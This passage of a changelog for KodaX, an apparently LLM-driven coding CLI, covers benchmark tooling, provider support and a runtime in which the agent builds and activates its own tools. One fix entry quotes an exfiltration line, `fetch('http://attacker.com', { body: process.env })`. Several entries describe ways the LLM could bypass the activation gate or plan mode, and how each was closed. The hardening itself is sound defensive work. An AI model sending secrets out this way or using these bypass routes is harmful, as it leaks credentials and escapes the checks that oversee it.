+ - **FEATURE_103 — Scout calibration + L5 user-followup escalate**: Scout's reasoning profile recalibrated `default: quick → balanced` and `max: balanced → deep` (post-FEATURE_061 Scout is no longer a classifier — it judges H0/H1/H2 cascading topology, executes H0, emits `executionObligations[]`, and emits FEATURE_078 `downstream_reasoning_hint` meta-reasoning; the v0.7.16 "quick" default was vestigial). Adds **L5** to the FEATURE_078 chain: at task-edge entry (`runKodaX` and `runManagedTaskViaRunner`), the user's prompt is scanned for *doubt* markers (`不对` / `错了` / `are you sure` / `that's wrong` / etc., requires prior-assistant-turn to fire) or *deepen* markers (`仔细` / `深入` / `think harder` / `reconsider` / etc., fires on first turn too) and the L1 ceiling auto-bumps one rank (off stays off, deep stays deep). L5 + L4 jointly close the dissatisfaction-detection surface: L4 catches *system*-detected dissatisfaction (Evaluator returns `revise`), L5 catches *user*-detected dissatisfaction. Single-rank bump (never jumps to max — multi-round dissatisfaction can step `quick → balanced → deep` across calls). 30 active unit tests cover doubt + deepen dictionaries, escalation invariants, off-kill-switch, and identity-preserving option transform.
506
+ - **FEATURE_104 — Prompt-Eval Harness Module + Quantitative Benchmark + benchmark/ folder convention**: New top-level `benchmark/` directory formalizes prompt-evaluation discipline. Convention is split: `benchmark/README.md` + `benchmark/datasets/` (test cases + golden inputs) + `benchmark/harness/` (code modules) are **version-tracked**; `benchmark/results/` (run outputs, persisted as `<ISO-timestamp>/{results.json, REPORT.md, codes/, codes-index.json}`) is **NOT version-tracked** (`.gitignore` retains nothing — committing a snapshot is opt-in for regression baselines). The 8 user-supplied coding-plan provider/model short aliases land in `benchmark/harness/aliases.ts` (`zhipu/glm51` / `kimi` / `mimo/v25{,pro}` / `mmx/m27` / `ark/glm51` / `ds/v4{pro,flash}`) with `resolveAlias` + `availableAliases` helpers (skip when API key absent). Reusable judges (`mustContainAll/Any` / `mustNotContain` / `mustMatch/NotMatch` / `lengthWithin` / `parseAndAssert` / `runJudges`) carry a `JudgeCategory` (`format` / `correctness` / `style` / `safety` / `custom`) so reports decompose quality. Three usage patterns documented: `runOneShot` (single probe), `runABComparison` (lightweight pass/fail matrix), `runBenchmark` (decision-grade multi-run with variance + persisted markdown REPORT.md across 9 sections — run summary, methodology, score matrix, sub-dimensions, latency observed, variance, ranking, **assertion failure patterns sorted by frequency**, reproduction). KodaX-specific deviation from the LiveCanvas recipe: **quality is the only ranking metric** — coding-agent users tolerate near-arbitrary latency for a correct answer, so combining quality + speed into a composite would reward fast-wrong over slow-correct (latency tracked for diagnostics but never scored). 41 zero-LLM self-tests run in default `npm test` (no API cost) and pin alias verbatim shape, judge category aggregation, REPORT.md rendering, persistence round-trip, and the negative-space invariant that the harness module **does not** export `speedScore` / `DEFAULT_SPEED_*` / `DEFAULT_COMPOSITE_WEIGHTS`. Convention written into `docs/CLAUDE.md` so future contributors must include a benchmark when touching `system-prompt-*.ts` / `role-prompt.ts` / tool descriptions / `DEFAULT_CODING_INSTRUCTIONS` / protocol-emitter prompts; reasoning-depth-only changes (FEATURE_078 / 103) explicitly excluded.
507
+ - **CAP contract test suite — 100 files in `__contract-tests__/` activated**: ~50 previously-stub `it.todo` blocks across CAP-001 through CAP-098 activated as part of FEATURE_100 P3 sharding. Each CAP file now includes risk metadata, time-ordering constraints, and STATUS markers ("ACTIVE since FEATURE_100 P3.6X"). Active assertions cover SA + AMA topologies identically — the same substrate executor is asked the same question on both surfaces and must answer the same way. Reverse-audit grep gates (`legacy parity restore` / `inadvertently dropped` / `inadvertently lost` / `preserves SA semantic`) all read **0** at end of release: a regression detection net for any future drift between the two surfaces.
508
+
509
+ ### Changed
510
+
511
+ - **`agent.ts` reduced from ~3000 lines to 49 lines** (FEATURE_100 P3.6r relocation): all reasoning + tool-loop + provider-payload + microcompact + middleware orchestration + cost tracking + extension events + provider-policy gate logic moved verbatim to `agent-runtime/run-substrate.ts:runSubstrate`. The legacy file is now a thin SDK wrapper: takes `(KodaXOptions, prompt)`, calls `Runner.run<KodaXResult>(createDefaultCodingAgent(), prompt, { presetOptions, abortSignal })`, asserts the substrate lifted `KodaXResult` onto `RunResult.data`, returns it. Behavioral parity verified by golden-trace replay across the contract-test suite. Re-exports for `buildAutoRepoIntelligenceContext`, `estimateProviderPayloadBytes`, `cleanupIncompleteToolCalls`, `saveSessionSnapshot`, etc. preserved so external callers see no API change.
512
+ - **Default coding agent declaration carries `substrateExecutor` + `middleware[] + reasoning` profile**: `createDefaultCodingAgent({...overrides})` now returns an Agent with three pre-populated declaration fields — `substrateExecutor` (the codingSubstrate closure that wraps `runSubstrate` and lifts the full `KodaXResult` onto `RunResult.data`), `middleware: DEFAULT_CODING_MIDDLEWARE` (autoReroute + mutationReflection + preAnswerJudge + postToolJudge, all enabled by default; substrate body honors the `enabled` flag when consulting the declaration), and `reasoning: DEFAULT_CODING_REASONING_PROFILE` (`{ default: 'balanced', max: 'deep', escalateOnRevise: true }` — matches AMA Generator/Planner profile). Replaces FEATURE_080 / v0.7.23 "Option Y" `registerPresetDispatcher` indirection: there is now a single canonical hook for the coding pipeline.
513
+ - **AMA Scout default reasoning raised to balanced/deep envelope** (FEATURE_103 calibration): Scout was `{ default: 'quick', max: 'balanced', escalateOnRevise: false }` — sized for the v0.7.16 classifier era. Now `{ default: 'balanced', max: 'deep', escalateOnRevise: false }`. `escalateOnRevise` stays false (Scout has no revise loop — emits `emit_scout_verdict` exactly once and hands off to Generator or Planner).
514
+ - **`KodaXOptions.reasoningMode` accepts `--reasoningCeiling` as alias** (FEATURE_078): both names parsed identically by `loadConfig`. No breaking rename — old configs and scripts continue to work; the new alias makes the L1 ceiling semantic explicit at the CLI surface for users who care.
515
+
516
+ ### Fixed
517
+
518
+ - **DefaultCodingAgent's `instructions` no longer empty / no longer overridable**: `createDefaultCodingAgent` enforces `Partial<Omit<Agent, 'name' | 'instructions'>>` so callers cannot accidentally null out the instructions string the substrate body relies on. CAP-094 contract test (CAP-DEFAULT-AGENT-001a / 001b / 001c / 001d / 002 / 002b / 002c) pins this — frozen Agent + non-empty instructions + presence of `substrateExecutor` + `middleware[]` + `reasoning` + override-preservation invariants.
519
+ - **Reverse-audit grep gates: legacy parity comments cleared (FEATURE_100 P4)**: 13 `// legacy parity restore` comments scattered across `runner-driven.ts` (added in v0.7.26 as AMA was retrofitted to call `runKodaX`-style behavior) all removed in P4 cleanup. The reverse-audit grep gates that fail-CI on `legacy parity restore` / `inadvertently dropped` / `inadvertently lost` / `preserves SA semantic` substrings all read 0 hits at release.
520
+ - **Stale CLI / core / prompts test expectations refreshed** (commit `5f7050e`): test fixtures that drifted off the post-P3 substrate behavior updated to match — covers prompts golden snapshots, CLI argument-parsing expectations, and cross-package import shapes.
521
+
522
+ ### Documentation
523
+
524
+ - **`docs/features/v0.7.29.md` design doc** — single-file design record covering FEATURE_100 (SA Runner Frame Adoption with full P1-P4 phased delivery plan, 5-layer assurance approach: capability inventory + golden trace + capability contract tests + dispatch eval baseline + reverse audit, plus 3 enhancements: known-missing-capability mining + contract-test-locks-capability-existence + reverse-audit-zero-hits) + FEATURE_078 (4-tier reasoning chain semantics + Agent declaration anchor migration) + FEATURE_103 (Scout calibration rationale + L5 design + KodaX-specific deviation from LiveCanvas recipe) + FEATURE_104 v1 + v2 (anti-pattern checklist mapping + module layout + folder version-tracking convention).
525
+ - **`docs/CLAUDE.md` adds Prompt Eval section** — explicit triggers (system-prompt-*.ts / role-prompt.ts / tool descriptions / DEFAULT_CODING_INSTRUCTIONS / protocol-emitter prompts), explicit non-triggers (FEATURE_078 / 103 reasoning-depth changes), folder layout (benchmark/{README, harness/, datasets/, results/}), and the run command (`npm run test:eval`).
526
+ - **`benchmark/README.md` convention guide** — full pattern catalog (Pattern 1 one-shot probe / Pattern 2 lightweight A/B / Pattern 3 quantitative benchmark with persistence), 6-step iteration workflow (read REPORT.md §8 → form hypothesis → edit ONE prompt section → smoke-test → full re-run → diff §3 + §8), statistical caveats baked in (n=3 default, ±10pp at this sample size, 3-point indistinguishability, latency reported but not scored).
527
+ - **`benchmark/datasets/README.md` dataset authoring guide** — directory layout convention (one folder per dataset with `case.ts` + README + optional fixtures/), what goes there vs. what doesn't.
528
+ - **`docs/features/v0.7.45.md` FEATURE_102 design doc landed** — Adaptive Multi-Provider Orchestration Runtime planned for v0.7.45 (4-phase route: telemetry/trace → review fan-out + objective arbiter → stage-level capability routing → fallback/health checks → data-driven adaptive). Provider switches happen at structured-output stage boundaries (not time boundaries) preserving prompt cache + tool-call protocol consistency. Document committed in this release; implementation is a future-version line item.
529
+ - **AGENTS.md + root CLAUDE.md consolidation**: agent-rules collapsed into a single root AGENTS.md so external contributors see the project conventions without spelunking docs/CLAUDE.md.
530
+ - **`docs/FEATURE_LIST.md`**: tracker count `101 → 103` (FEATURE_103 + FEATURE_104 added), "Current released version" pointer advanced to `v0.7.29`, FEATURE_078 / 103 / 104 / 102 narrative entries added with full design-rationale explanations.
531
+
532
+ ---
533
+
534
+ ## [0.7.28] - 2026-04-26
535
+
536
+ ### Theme
537
+
538
+ Self-construction tier 2 — KodaX builds, statically audits, and activates runtime tools that the LLM uses immediately, no deploy. Standalone binary distribution via Bun --compile. Provider catalog refresh (DeepSeek V4, MiMo, Ark, kimi-code label collapse). Thinking-mode multi-turn replay hardened across providers. Construction lifecycle policy-gate ordering closed end-to-end.
539
+
540
+ ### Added
541
+
542
+ - **FEATURE_087 + FEATURE_088 — Self-construction runtime + tool generation**: KodaX gains a four-segment lifecycle (`stage_tool` → `test_tool` → `activate_tool` → `revoke_tool`) for runtime-generated capabilities, with a Constructed-World tier living under `.kodax/constructed/<kind>s/<name>/<version>.json` that merges into the same registry as builtin tools (last-wins stack semantics). Tool generation is the first real consumer: Coding Agent emits a `ToolContent` (description + JSON Schema input + `capabilities.tools` allowlist + JS handler source string) which the runtime persists, statically audits (3 hard AST rules — no-eval / no-Function-constructor / require-handler-signature — plus optional LLM-review with `safe` / `suspicious` / `dangerous` verdicts plus Anthropic schema validation), then activates through a policy gate. Activated handlers run in-process (no V8 isolate / worker — single-user CLI threat model), receiving a `CtxProxy` that gates `ctx.tools.<name>` calls through the existing `executeTool` dispatch path so constructed handlers reuse every per-tool safety policy that ships with builtins (bash OS sandbox, write path policy, truncation, error mapping). Single-active-version per name with stack rollback when revoked. REPL surface binds an `askUser`-driven dialog policy for `'ask-user'` verdicts; non-REPL surfaces (CLI, ACP, child agents) default-reject so silent activation outside an interactive UI is impossible.
543
+ - **CLI direct dispatch + lifecycle subcommands for constructed tools**: `kodax <constructed-tool> [args...]` invokes a previously-activated constructed tool from the shell without opening the REPL — turns KodaX into an LLM-extensible CLI platform. `kodax tools list` / `kodax tools inspect <name>[@<version>]` / `kodax tools revoke <name>@<version>` cover inventory and lifecycle from the shell. Args map onto `inputSchema` via `--key=value` / `--key value` / `--flag` / single-positional → first-required-string-field, with type coercion driven by `inputSchema.properties[key].type` (string / integer / number / boolean + JSON fallback for arrays / objects). CLI bootstrap binds an `async () => 'reject'` policy so `activate` cannot succeed from this surface — direct dispatch is for *invoking* already-activated tools, not approving new ones. Reserved subcommand names (`skill`, `acp`, `completion`, `tools`) are guarded against constructed-tool name collision.
544
+ - **Standalone binary distribution via Bun `--compile`**: New `scripts/build-binary.mjs` produces self-contained executables for Windows / Linux x64+arm64 / macOS x64+arm64 under `dist/binary/<target>/` with a sidecar `builtin/` directory (skill assets that `KODAX_BUNDLED=true` resolves at runtime). Build-time defines bake `process.env.NODE_ENV='production'`, `KODAX_BUNDLED='true'`, and `KODAX_VERSION='<x.y.z>'` directly into the binary so `kodax --version` reports the source-of-truth version. Smoke-tested on win-x64: rehydrate of a pre-staged constructed tool + `kodax count_lines sample.txt` direct dispatch + `ctx.tools.read` builtin call all work end-to-end, proving `await import('file:///.../<version>.js')` ESM dynamic load functions inside a bun-compiled binary. README updated with installation guidance for the binary channel.
545
+ - **FEATURE_099 — Provider catalog refresh (DeepSeek V4 + kimi-code label collapse)**: DeepSeek V4 series wired in (`v4-flash` as the default + `v4-pro` as alternate); `kimi-code` model label collapses to a single `kimi-for-coding` (the upstream gateway routes to its own active model regardless of `model` field, so multiple labels were noise); deprecated `deepseek-chat` / `deepseek-reasoner` removed. Total provider count after this cycle: 13 (AnthropicCompat 6 + OpenAICompat 5 + CLI bridge 2).
546
+ - **FEATURE_098 — Per-model `contextWindow` / `maxOutputTokens` lookup at the wire layer**: `KodaXModelDescriptor.contextWindow` and `maxOutputTokens` had been declared in the type since FEATURE_078 but never read at runtime; the compaction trigger and wire-level `max_tokens` always used the provider-level fallback. This release threads the **active model's** descriptor through the compaction call sites (`packages/coding`, `packages/repl`) and the wire layer (`packages/ai/src/providers/{anthropic,openai}.ts`), so each request scales correctly to that model's published limits. Custom providers' `models[]` field upgraded to accept either a literal string or a `KodaXModelDescriptor` object (back-compat preserved). Pinned correct context windows for `kimi.k2.5` (256K — earlier 128K was a misreading of the Moonshot docs, corrected in `64785de`), `zhipu.glm-5-turbo` (128K), and the five ark-coding routes (`kimi-k2.5/k2.6` 256K, `minimax-latest` 204800, `doubao-seed-2.0-{code,pro,lite}` 256K). `compaction.contextWindow` config clarified in docs as a *manual override* — the per-model descriptor is the default source.
547
+ - **Volcengine Ark Coding Plan provider (`ark-coding`)**: New AnthropicCompat-route provider for the Ark gateway. Multi-model with **server-side routing by request `model` field** (distinguishes from `kimi-for-coding`, where the server ignores the model). 9 routes regression-tested with real upstream calls: `glm-5.1` / `glm-4.7` / `kimi-k2.6` / `kimi-k2.5` / `minimax-latest` / `deepseek-v3.2` / `doubao-seed-2.0-{code,pro,lite}`. Reuses `parseToolInputWithSalvage` and the rest of the existing AnthropicCompat stack — zero new transport code.
548
+ - **Xiaomi MiMo Token Plan provider (`mimo-coding`)**: New AnthropicCompat-route provider for MiMo Token Plan gateway. Wired through the standard provider stack including cost-rates, RST-prone list (servers in this family are known to require `tool_use` input salvage on partial JSON streams), and config example. Eval matrices (`coding-plan` provider eval, `identity-roundtrip` eval) cover it alongside the other AnthropicCompat coding-plan providers.
549
+ - **Tool_use input salvage unified across Anthropic-compat + OpenAI-compat paths**: Previously `parseToolInputWithSalvage` (recovery for partial / truncated `input_json_delta` streams that some upstream servers emit) lived in the Anthropic compat path only. OpenAI-compat providers had a separate, more naive parser. Unified at the wire layer so both paths recover from the same set of edge cases — relevant especially for the new MiMo / DeepSeek-V4 / Ark routes where partial-JSON behaviour was empirically observed.
550
+ - **KodaX self-identity + runtime awareness in role prompts**: Scout / Planner / Generator / Evaluator role prompts now begin with a runtime-fact preamble identifying the agent as KodaX, naming the active provider + model, and stating which agent-mode (SA / AMA / managed) is driving the loop. Prevents identity confusion in multi-agent transcripts where the LLM occasionally hallucinates being "Claude" or "the assistant" and the user has to re-anchor.
551
+
552
+ ### Fixed
553
+
554
+ - **Construction Phase 2 — policy gate ordering + lifecycle hardening**: a chain of bugs hollowed out the 4-layer defense model that v0.7.28 ships. Phase 2 review uncovered them all and this version closes them as a unit:
555
+ 1. `test()` removes its `loadHandler` call. Earlier code did `await import(file://...)` BEFORE the policy gate, so AST rules covering `eval` / `Function` did nothing against a top-level `await fetch('http://attacker.com', { body: process.env })`. Handler import is now exclusively inside `activate()` after the policy verdict is `'approve'`, making the policy gate the single chokepoint for code execution.
556
+ 2. `activate()` requires `artifact.testedAt` set. Without this an LLM could `stage_tool → activate_tool` directly, bypassing the AST / schema / LLM-review chain.
557
+ 3. `activate()` re-reads from disk by `name+version`. Filesystem is the source of truth (DD §14.1); the in-memory `handle.artifact` may be stale across the chain.
558
+ 4. `stage()` explicitly resets `testedAt` / `activatedAt` / `revokedAt` / `contentHash` on persist — defends against an LLM-supplied artifact pre-stamping `testedAt` to bypass the gate.
559
+ 5. `stage()` refuses any-status restage at the same `name@version`. Earlier code only blocked `'active'`; staged + revoked were allowed and both leak (the ESM module cache keys by file URL so re-writing `<version>.js` silently shadows previously-loaded code, and Node has no public ESM eviction API). Bumping semver is the only safe-by-construction update path.
560
+ 6. Path-traversal validation on `artifact.name` and `artifact.version` (rejects `/`, `\`, `..`, control chars, leading/trailing dots, length > 128, anything outside `[A-Za-z0-9][A-Za-z0-9._-]*`).
561
+ 7. `CtxProxy` honors `hostCtx.planModeBlockCheck` for `ctx.tools.<name>` calls. A constructed handler can no longer bypass the parent's plan-mode gate by routing builtin invocations through `ctx.tools.bash`. Predicate closes over live parent state, so toggles propagate.
562
+ 8. `CtxProxy` caps constructed→constructed call depth at `MAX_CONSTRUCTED_DEPTH=5`. Builtin callees are not counted (they don't recurse via `ctx.tools`). Catches accidental A→B→A loops.
563
+ 9. `activate()` records `contentHash = sha256(JSON.stringify(content))`; `rehydrateActiveArtifacts()` recomputes and compares. Mismatch → skip + console.warn + REPL boot banner surfaces a per-tool message ("X skipped due to manifest contentHash mismatch — re-stage and re-activate to re-approve"). Threat model: catches naive cross-session manifest tampering (LLM rewrites `.json` via the Write tool but doesn't recompute hash). Coordinated tampering (rewrite + recompute) is explicitly out of scope per single-user CLI threat model. Legacy artifacts written before `contentHash` existed rehydrate unchanged for upgrade-compat.
564
+ - **`redacted_thinking` data preservation through stream serialization**: Anthropic streams the `redacted_thinking` payload's `data` field on `content_block_start` itself (no deltas, and the stop event does not carry `content_block`). Earlier streaming code captured nothing at start and tried to read `(event as any).content_block.data` at stop — always `undefined`. The redacted reasoning was silently dropped from `thinkingBlocks`, breaking any downstream replay path. Fix: capture `block.data` into a new `currentRedactedData` state var at start; push from state at stop; reset between consecutive blocks so they don't bleed.
565
+ - **DeepSeek V4 thinking-mode multi-turn replay across providers** (issue 125): DeepSeek V4 thinking mode 400s on multi-turn requests when the assistant turn in history lacks `reasoning_content` (empirically reproduced via direct API probe). Switching from an Anthropic-compat provider to DeepSeek V4 mid-conversation also lost prior reasoning since cross-provider thinking blocks couldn't replay against Anthropic's signature verification.
566
+ - `openai.ts`: when the `replayReasoningContent` flag is set, every assistant turn carries `reasoning_content` (defaults to `''`) regardless of whether the turn produced thinking — covers cross-provider switch and thinking-only / redacted-only / no-thinking history shapes.
567
+ - `anthropic.ts`: under `strictThinkingSignature` (Anthropic official), cross-provider thinking blocks without trusted signatures convert to a `<prior_reasoning>` text block injected before tool_use to preserve reasoning intent. Kimi guard skips when strict mode is on.
568
+ - `KodaXProviderConfig`: new `replayReasoningContent` and `strictThinkingSignature` flags. `AnthropicProvider` gets `strictThinkingSignature: true`; DeepSeek V4 + Kimi/Qwen/Zhipu OpenAI-compat all opt into `replayReasoningContent` (DeepSeek verified; the other three share the identical failure-mode shape and opt in for max fault-tolerance per user direction; OpenAI proper stays explicitly off — different protocol).
569
+ - **Session history preservation on permanent thinking-mode errors** (regression): when DeepSeek thinking-mode 400 (or any permanent provider error) hit the SA / runner-driven loop, the outer wrapper used to write `messages: []` to the session snapshot, wiping the user's conversation on `/resume` — next prompt would start as a fresh session with no Scout context and progress bar at 0.
570
+ - L0 (history preservation): inner catch (`runner-driven.ts`) attaches in-flight `providerMessages` to the thrown error via a non-enumerable `__kodaxRecoveredMessages` property. Outer catch reads it back through an `Array.isArray` guard. Non-enumerable so JSON-serializing telemetry doesn't dump conversation history into logs.
571
+ - L3 (`sanitize_thinking_and_retry` recovery action): classifier identifies `reasoning_content_required` errors via three patterns; recovery coordinator gains a single-shot `thinkingSanitizationUsed` latch — drops thinking blocks once and retries once, bypassing `maxRetries`. Both runner-driven (Layer-A) and `agent.ts` (legacy SA) loops carry parallel sanitize-bypass branches; SA and AMA are first-class parallel surfaces.
572
+ - REPL UX: `retry-history` banner gets a specific message for the sanitize action so users see "dropping prior thinking · retrying" instead of the generic "Provider request timed out · retrying".
573
+ - **Issue 124 — `dispatch_child_task` fan-out gates closed**: tool was rarely triggering in real usage despite existing since v0.7.18 (FEATURE_067). Empirical eval across `zhipu-coding`, `minimax-coding`, `deepseek-v4-flash` showed the LLM dispatches correctly when given the tool — the bottleneck was layered controller gates closing the fan-out signal before downstream consumers ever saw it.
574
+ - Gate changes (`reasoning.ts`): drop `H0_DIRECT` requirement on evidence-scan + module-triage so H1 read-only investigation can fan out (the earlier H0-only gate made dispatch effectively impossible after Scout escalated); enable hypothesis-check in `H2_PLAN_EXECUTE_EVAL` (previously hardcoded `return false`); drop blanket `profile === tactical` filter for read-only fan-out classes (hypothesis-check / write class still requires tactical for safety).
575
+ - Prompt change (`role-prompt.ts`): added "When NOT to use dispatch_child_task" negative-bumper list to Scout and Generator prompts. Empirically tested on 3 providers × 3 variants × 3 tasks; ties or improves over the existing RULE A/B/C prompt.
576
+ - Telemetry (`dispatch-child-tasks.ts`): emit `[dispatch] start/end` progress markers via existing `ctx.reportToolProgress` (`KodaXEvents` channel) — zero new event types, zero new logger. `try/finally` ensures balanced start/end pairs even on executor exception.
577
+ - **`scripts/build-binary.mjs` `--define` quoting on Windows** (latent build bug): Bun's `--define key=value` substitutes the source text of `value` for every reference to `key`. The script passed `--define process.env.NODE_ENV="production"` as a Node `spawnSync` arg. On Windows the embedded `"` characters are stripped during the `spawnSync` → `CreateProcess` pipeline, so bun saw `process.env.NODE_ENV=production` and substituted bare identifier `production` — undefined at runtime, binary crashed immediately with `ReferenceError: production is not defined` at first React import. Switched to single-quoted JS string literals (`'production'`, `'true'`, `'${version}'`); single quotes survive the round-trip and bun substitutes a real string literal. Same fix applied to `KODAX_BUNDLED` and `KODAX_VERSION`. `react-devtools-core` added to `devDependencies` so `bun --compile`'s static import resolution can satisfy Ink's conditional dev-only branch (without it the bundle phase aborted with `Could not resolve: "react-devtools-core"`).
578
+ - **`kimi.k2.5` context window 128K → 256K**: earlier descriptor pin was a misreading of Moonshot's docs. Corrected in `64785de`; the subsequent FEATURE_098 plumbing now reads the correct value.
579
+ - **`max_tokens` routing — salvage + L5 normalization, L1 escalation dropped, zhipu watchdog**: cleaned up the layered `max_tokens` selection so partial-JSON salvage + L5 (final clamp to provider ceiling) is the canonical path; L1 (per-request escalation) had become redundant after FEATURE_098 plumbed per-model `maxOutputTokens` and was removed. New zhipu watchdog handles the case where the gateway responds with a token budget below the configured request — falls back to the gateway's reported limit instead of looping the request.
580
+ - **`mimo-coding` provider wiring**: cost-rates entry, RST-prone list inclusion (servers requiring `tool_use` input salvage), and config example.
581
+ - **`managed-worker` role prompt missing runtime fact**: the runtime-awareness preamble that Scout / Planner / Generator / Evaluator received was not threaded through the managed-worker path. Fixed so worker agents in the managed task graph also see the active provider / model / agent-mode.
582
+ - **`repl` package vitest config missing `@kodax/skills/shared/yaml` subpath alias**: follow-on to v0.7.27 FEATURE_086 子任务 B 第 5 条. Test runs in the `repl` package now resolve the new subpath export.
583
+ - **Provider-policy / extension-runtime / bash test flaky timeouts**: stabilized via deterministic clock injection where the underlying logic was correct but tests were time-sensitive.
584
+
585
+ ### Changed
586
+
587
+ - **Active model passed at the wire layer (anthropic / openai providers)**: prerequisite for FEATURE_098 per-model lookup. Rather than reading the provider's default model at request build time, the wire-layer methods now accept the active model identifier so the descriptor lookup hits the **actual** model, not the provider default.
588
+ - **Active model threaded through compaction call sites (coding / repl)**: same thread, downstream — compaction's `contextWindow` calculation now uses the active model's descriptor instead of the provider's default-model descriptor.
589
+ - **CLI dead-code cleanup + `constructed_cli` reserved-name tightening**: removed an unused `CliBootstrapContext` interface, an unused `listToolDefinitions` import, and clarified the reserved-subcommand list so a constructed tool literally named `skill` / `acp` / `completion` / `tools` cannot shadow the matching commander subcommand.
590
+
591
+ ### Documentation
592
+
593
+ - **FEATURE_098 / FEATURE_099 entries recorded**: provider catalog refresh + per-model context window / output limits documented as v0.7.28 features (originally planned for v0.7.29; pulled in because implementation completed early). Includes the `kimi.k2.5` 128K → 256K post-implementation correction note.
594
+ - **`kodax.config.ts` policy override design retracted**: an earlier draft proposed a user-authored `constructionPolicy` exported from `kodax.config.ts`. Review concluded this violated KodaX philosophy (`leverage LLM intelligence` + `NEVER add configuration for hypothetical needs`) — single-user CLI doesn't need a config hook the user has to think about; if a future need arises, the right shape is a `risk_mode` enum (`'strict' | 'balanced' | 'trusting'`) auto-driven by capabilities, not user-written policy functions. Deferred Design Decisions appendix in `docs/features/v0.7.28.md` records the retraction + rationale.
595
+ - **OpenAI-compat thinking replay limitation note updated**: kimi / qwen / zhipu now opt into `replayReasoningContent` (max-tolerance), tracked in KNOWN_ISSUES 125 for "未独立 API 实证" follow-up.
596
+ - **`agent.ts` sanitize-bypass comment corrected**: the legacy SA loop and the AMA Layer-A loop are *parallel* paths, not legacy → migration. The earlier comment implied SA was being phased out; corrected to reflect that both surfaces are first-class.
597
+ - **Known issue 124 — dispatch eval baseline + provider variance probe**: documents the 4-layer compounding gate closure root-cause analysis, the implementation slice (A1 / A2 / A5b / A4 / B1) and follow-ups (A3 phantom, B2 / B3 data-driven defer, A2 pre-Scout heuristic limitation), and the cross-model variance baseline (`deepseek-v4-flash` 100% / `v4-pro` 60% / `chat` 40% direct fan-out, with v4-pro's "scope-first" pattern being delayed-but-correct multi-turn dispatch, not missed dispatch).
598
+ - **`compaction.contextWindow` clarified as manual override**: with FEATURE_098 reading per-model descriptor as the default, the user-configurable knob is now explicitly an override path. README + config docs updated accordingly.
599
+ - **FEATURE_098 follow-up planning for v0.7.29**: tracks remaining per-model gaps (e.g., `gpt-5*` family, future Anthropic models) where descriptor data is incomplete.
600
+
601
+ ---
602
+
603
+ ## [0.7.27] - 2026-04-24
604
+
605
+ ### Theme
606
+
607
+ Structural hygiene tail — legacy cleanup + repo-intelligence protocol extraction + AMA repo-intel prompt injection regression fix + Ink TUI trace surface.
608
+
609
+ ### Added
610
+
611
+ - **FEATURE_091 — `@kodax/repointel-protocol` standalone package** — extract the daemon RPC contract (`REPOINTEL_CONTRACT_VERSION`, `RepointelCommand`, `RepointelRequestPayload`/`RpcRequest`/`RpcResponse`, `RepoPreturnBundle`, host/intent enums, default endpoint) into a zero-runtime-deps npm package so external CLI clients (codex / claude / opencode) can depend on the contract without pulling the whole `@kodax/coding` runtime. Publishing path: `packages/repointel-protocol/`.
612
+ - Consumers migrated to import from `@kodax/repointel-protocol`: `packages/coding/src/index.ts` re-exports `REPOINTEL_DEFAULT_ENDPOINT` unchanged, `packages/coding/src/repo-intelligence/premium-client.ts` + `runtime.ts` switch to the new import source; the original `packages/coding/src/repo-intelligence/premium-contract.ts` is removed (git tracks the rename to `packages/repointel-protocol/src/index.ts`).
613
+ - `tsconfig.build.json` + `packages/coding/tsconfig.json` + `packages/coding/package.json` + `vitest.config.ts` all wired; `@kodax/coding` top-level consumers see no surface change.
614
+ - **Ink TUI repo-intelligence trace surface (OFF by default in REPL, tight-stacked)** — new `packages/repl/src/ui/utils/repo-intel-history.ts` renders `emitRepoIntelligenceTrace` / `emitManagedRepoIntelligenceTrace` events as single-line info items (`📡 [RepoIntel] <stage> · <details>`) with `tightSpacing: true` so consecutive trace stages stack as one compact block instead of each claiming an extra blank line. Wired in `InkREPL.tsx` via `emitInfoItemToCorrectLayer`, which now propagates `tightSpacing` through the managed-foreground ledger (previously dropped when reconstructing the ledger item, causing blank lines to return on AMA turns). `HistoryItemInfo` gained an opt-in `tightSpacing?: boolean`; `InfoItemRenderer` switches `marginBottom` between `0` and `1` based on the flag. `repoIntelligenceTrace` defaults to OFF for the Ink REPL to match v0.7.20-era transcript density (tool calls surface as usual; auto-injection stays silent unless opted in); `/repointel trace on` persists opt-in to `~/.kodax/config.json`. CLI / ACP surfaces keep the pre-existing env-only default (false) unchanged.
615
+ - **Planner / H1 Evaluator / H1 readonly Generator can now invoke repo-intel deep-capsule tools** (`module_context` / `symbol_context` / `process_context` / `impact_estimate`). Previously only Scout (unrestricted) and H2 Generator (open-scope) had access; Planner shaping a cross-module sprint contract and Evaluator precisely quantifying blast radius had to fall back to grep heuristics or wait for Scout/Generator to surface the capsule. auto-injection (FEATURE_083) still only packs the **active** module + impact, so explicit lookups were the missing path for cross-module work. Extension lives in `tool-policy.ts` allow-lists only; tool descriptions at the registry layer already explain the contract, so no role-prompt text changes were needed. Allow-list regression tests in `tool-policy.test.ts` pin the new members.
616
+
617
+ ### Fixed
618
+
619
+ - **AMA Runner-driven path lost prompt-level repo-intelligence injection** (regression introduced in v0.7.26 FEATURE_084 Shard 6d-L). Legacy `runKodaX` injected the repo-intelligence context block (Repository Overview, Changed Scope, Active Module Intelligence, Active Impact Intelligence, Repo Intelligence Guidance) into every Scout / Planner / Generator / Evaluator role's system prompt via `buildAutoRepoIntelligenceContext` + `buildSystemPrompt`. The Runner-driven path built the role agents directly and invoked them via `Runner.run`, bypassing `runKodaX` entirely, so AMA agents ran with no prompt-level repo awareness for a full version.
620
+ - Fix: `buildAutoRepoIntelligenceContext` is now exported from `agent.ts`; `runManagedTaskViaRunner` computes the block once per entry (after `plan` resolves, before Agent chain construction) using the same `isNewSession` heuristic legacy `runKodaX` used (`messages.length === 1` → `session.initialMessages?.length === 0`). The pre-built string threads through `RunnerChainPromptContext.repoIntelligenceContext`; `resolveRoleInstructions` prepends it to every role's `createRolePrompt` output. Capture failure is swallowed (best-effort, matches legacy resilience). Tests / topology-only paths that don't set the field behave exactly as before.
621
+ - **`edit` / `multi_edit` error messages lost information in v0.7.26** — ambiguous-match + not-found error diagnostics now include line numbers, widened-anchor guidance, and the anchor-consumed-by-prior-edit case-specific diagnostic (issue #122). Restored all message detail the P2b/C4 tightening had trimmed. Symmetric across `edit` and `multi_edit`.
622
